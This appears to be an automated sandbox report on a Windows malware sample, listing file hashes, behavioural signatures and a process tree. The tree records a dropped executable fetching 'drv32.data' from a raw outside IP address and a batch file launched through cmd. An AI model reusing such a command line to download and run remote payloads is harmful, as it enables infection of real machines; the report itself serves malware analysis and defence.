Analysis
-
max time kernel
117s -
max time network
117s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
11/07/2024, 22:50
Behavioral task
behavioral1
Sample
3b064b859c44a60d05e9c9107fccef9f_JaffaCakes118.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
3b064b859c44a60d05e9c9107fccef9f_JaffaCakes118.exe
Resource
win10v2004-20240709-en
General
-
Target
3b064b859c44a60d05e9c9107fccef9f_JaffaCakes118.exe
-
Size
90KB
-
MD5
3b064b859c44a60d05e9c9107fccef9f
-
SHA1
49b865d26c49a3a588dd244160e49b58bb046ffb
-
SHA256
ed8b78accaf3687b64236859401bf2df4b1f118b0aa44aa58cec1e4418199ec8
-
SHA512
4d6f97508c37fbbd50ed18783e36a69f3e97a692acb42ae67c5a5d731343933c655748d9bf550c2eae62147d2b92b1e535ce5abe99ccb87b18f336c1f81064d4
-
SSDEEP
1536:IabFGjiGBC2QwQB1Gh9jNkt5G3CXLSTRfQ+QWgChE1PcbZ7lG++XMQ:9ZGuAC9dB10J+5e+LkJaWE097lG+kf
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
pid Process 2964 GEC72-tmp.exe -
Loads dropped DLL 3 IoCs
pid Process 2128 3b064b859c44a60d05e9c9107fccef9f_JaffaCakes118.exe 2128 3b064b859c44a60d05e9c9107fccef9f_JaffaCakes118.exe 2128 3b064b859c44a60d05e9c9107fccef9f_JaffaCakes118.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 2128 wrote to memory of 2964 2128 3b064b859c44a60d05e9c9107fccef9f_JaffaCakes118.exe 30 PID 2128 wrote to memory of 2964 2128 3b064b859c44a60d05e9c9107fccef9f_JaffaCakes118.exe 30 PID 2128 wrote to memory of 2964 2128 3b064b859c44a60d05e9c9107fccef9f_JaffaCakes118.exe 30 PID 2128 wrote to memory of 2964 2128 3b064b859c44a60d05e9c9107fccef9f_JaffaCakes118.exe 30 PID 2128 wrote to memory of 1148 2128 3b064b859c44a60d05e9c9107fccef9f_JaffaCakes118.exe 33 PID 2128 wrote to memory of 1148 2128 3b064b859c44a60d05e9c9107fccef9f_JaffaCakes118.exe 33 PID 2128 wrote to memory of 1148 2128 3b064b859c44a60d05e9c9107fccef9f_JaffaCakes118.exe 33 PID 2128 wrote to memory of 1148 2128 3b064b859c44a60d05e9c9107fccef9f_JaffaCakes118.exe 33
Processes
-
C:\Users\Admin\AppData\Local\Temp\3b064b859c44a60d05e9c9107fccef9f_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\3b064b859c44a60d05e9c9107fccef9f_JaffaCakes118.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2128 -
C:\Users\Admin\AppData\Local\Temp\GEC72-tmp.exe"C:\Users\Admin\AppData\Local\Temp\GEC72-tmp.exe" http://78.129.166.25/drv32.data "C:\Users\Admin\AppData\Local\Temp\GEC73-tmp"2⤵
- Executes dropped EXE
PID:2964
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\amp.bat" "2⤵PID:1148
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
89KB
MD59d520220399f61297cb7aba9f37f8d27
SHA1d06608d8425b586b8bf83a9fa836b16b113ebbd1
SHA2566c00076abb293e657935e149312893ed40839c8034d38c76ab1aeccc6fc7910e
SHA51251500da7bc388c4772b627701d43275baaead00f4af229a24a243ce26f366c8ef56bebee9949cefd2d51598b93c4d6c1c7d186eeb78815830f3506106f5ec892
-
Filesize
51B
MD5d807cf6ab276eeffe1c58bf4bd7b4e11
SHA14c4728a9fc17d945778e352863d76d6400b3facc
SHA256b7db48ab7046fcdd8030989572bb3fb7d150773004841b9b8797b6eb392f6628
SHA512eb7ea24bee7a774b0e816ac9f4860f8cf6eb24813dad39ddd3d127465c15ae94d16380d28a98c6aedca5e3f2d4e7c0075d00b123e415a3748f3da7ebf0fd2873